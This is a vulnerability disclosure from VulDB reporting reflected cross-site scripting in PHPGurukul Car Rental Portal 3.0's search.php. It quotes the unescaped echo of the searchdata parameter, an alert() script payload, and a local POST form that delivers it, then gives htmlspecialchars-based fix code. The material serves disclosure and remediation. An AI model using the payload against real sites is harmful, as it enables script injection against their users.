Submit #435179: PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax (Info)

Title: PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax
Description:

[XSS vulnerability] found in Car Rental Portal 3.0 - (search.php)

Affected Project: Car Rental Portal
Web: Php
Vendor: PHPGurukul
Official Website: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
Version: 3.0
Updated: 05 June 2024
Vulnerable file: /search.php
Injection parameter: searchdata
Size: 16.0 MB
Sha256: 8a9ad60cf5f36e2c3c4a1ce6fed7438bb458a2d2489e2a1be60dbbdd481fdf8b

Vulnerability Description:

The issue arises because the `searchdata` parameter from the URL is being directly inserted into the value attribute of an HTML input element without proper sanitization. This allows an attacker to inject arbitrary HTML or JavaScript code, leading to an XSS attack.

Vulnerable code:

```php
<h1>Search Result of keyword "<?php echo $_POST['searchdata'];?>"</h1>
```

Injection Payload Tested:

We set `searchdata` to:

```
"><script>alert('XSS')</script>
```

Execution:

When the browser parses this through a POST request, it executes the `<script>alert('XSS')</script>` code, resulting in a popup displaying `"XSS"`.

Demonstration:

Below is what `search.php` looks like:

https://i.postimg.cc/mg6Vs6Vd/1.png

As it is a POST request, we need to use a file test_form.html with the following content to be able to trigger the XSS popup:

```html
<!DOCTYPE html>
<html>
<head>
  <title>Search Form</title>
</head>
<body>
  <form action="http://localhost:8000/carrental/search.php" method="POST">
    <input type="text" name="searchdata" value='"><script>alert("XSS")</script>'>
    <input type="submit" value="Search">
  </form>
</body>
</html>
```

Then we have to open it in the browser, for example: file:///home/username/Desktop/test_form.html

https://i.postimg.cc/nVYkzL09/2.png

After submitting the payload using POST with the vulnerable parameter `searchdata` and the XSS payload `"><script>alert('XSS')</script>`, XSS is triggered:

https://i.postimg.cc/t4fdfnCw/3.png

Recommendation for Preventing XSS:

To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like htmlspecialchars() in PHP to encode special characters.

Example:

```php
<?php
// Retrieve the search data using GET
$searchData = isset($_GET['searchdata']) ? $_GET['searchdata'] : '';
// Escape the output to prevent XSS
$safeSearchData = htmlspecialchars($searchData, ENT_QUOTES, 'UTF-8');
```

> One Click Can Change Everything: Be Secure.
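
The recommendation above, applied to the `$_POST['searchdata']` value that the vulnerable line echoes, as an added example (not code from the report or from PHPGurukul). It assumes PHP 8, and the function names `e`, `heading_unsafe`, `heading_safe` and `search_box_safe` are hypothetical; it renders the raw heading next to the encoded one and applies the same encoding inside a quoted `value` attribute.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: encode a request value for HTML element content or a
// quoted attribute value.
function e(mixed $value): string
{
    // searchdata[]=x arrives as an array; treat any non-string as empty.
    if (!is_string($value)) {
        return '';
    }
    // ENT_QUOTES encodes both " and '. ENT_SUBSTITUTE replaces invalid UTF-8
    // sequences instead of making htmlspecialchars() return an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "Before": same pattern as the vulnerable line, the POST value is emitted raw.
function heading_unsafe(array $post): string
{
    return '<h1>Search Result of keyword "' . ($post['searchdata'] ?? '') . '"</h1>';
}

// "After": the value is encoded at the point of output.
function heading_safe(array $post): string
{
    return '<h1>Search Result of keyword "' . e($post['searchdata'] ?? '') . '"</h1>';
}

// Same encoding when the value is reflected into a double-quoted attribute.
function search_box_safe(array $post): string
{
    return '<input type="text" name="searchdata" value="' . e($post['searchdata'] ?? '') . '">';
}

// Constructed sample request body, using the payload quoted in the report.
$post = ['searchdata' => '"><script>alert(\'XSS\')</script>'];

echo heading_unsafe($post), PHP_EOL;   // markup from the parameter survives
echo heading_safe($post), PHP_EOL;     // parameter is rendered as text
echo search_box_safe($post), PHP_EOL;  // parameter stays inside value="..."

// Fail loudly if encoded output still contains markup from the parameter.
foreach ([heading_safe($post), search_box_safe($post)] as $html) {
    if (str_contains($html, '<script') || str_contains($html, '"">')) {
        fwrite(STDERR, "encoding check failed\n");
        exit(1);
    }
}
```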
Source: https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20Car%20Rental%20Portal%203.0%20-%20(search.php).md
User: secuserx (UID 76735)
Submission: 2024-11-01 01:17 (2 years ago)
Moderation: 2024-11-01 18:07 (17 hours later)
Status: Accepted
VulDB entry: 282869 [PHPGurukul Car Rental Portal 1.0 /search.php searchdata cross site scripting]
Points: 20
